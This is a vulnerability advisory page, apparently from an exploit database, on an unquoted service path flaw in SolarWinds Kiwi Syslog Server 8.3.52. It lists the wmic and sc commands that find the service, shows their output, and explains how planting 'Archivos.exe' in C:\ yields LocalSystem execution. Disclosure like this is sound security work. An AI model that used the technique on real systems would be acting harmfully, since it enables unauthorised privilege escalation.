SolarWinds Kiwi Syslog Server 8.3.52 Unquoted Service Path

2019.11.10

Credit: Carlos A Garcia R

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
# Date: 2019-11-08
# Exploit Author: Carlos A Garcia R
# Vendor Homepage: https://www.kiwisyslog.com/
# Software Link: https://www.kiwisyslog.com/downloads
# Version: 8.3.52
# Tested on: Windows XP Professional Service Pack 3
# Description:
# SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs
# PoC:
# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Kiwi Syslog Server Kiwi Syslog Server C:\Archivos de programa\Syslogd\Syslogd_Service.exe Auto
# C:\>sc qc "Kiwi Syslog Server"
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: Kiwi Syslog Server
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Kiwi Syslog Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit
Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe"
could be placed in "C:\", and it would be executed as the Local System user
next time the service was restarted.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SolarWinds Kiwi Syslog Server 8.3.52 Unquoted Service Path

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.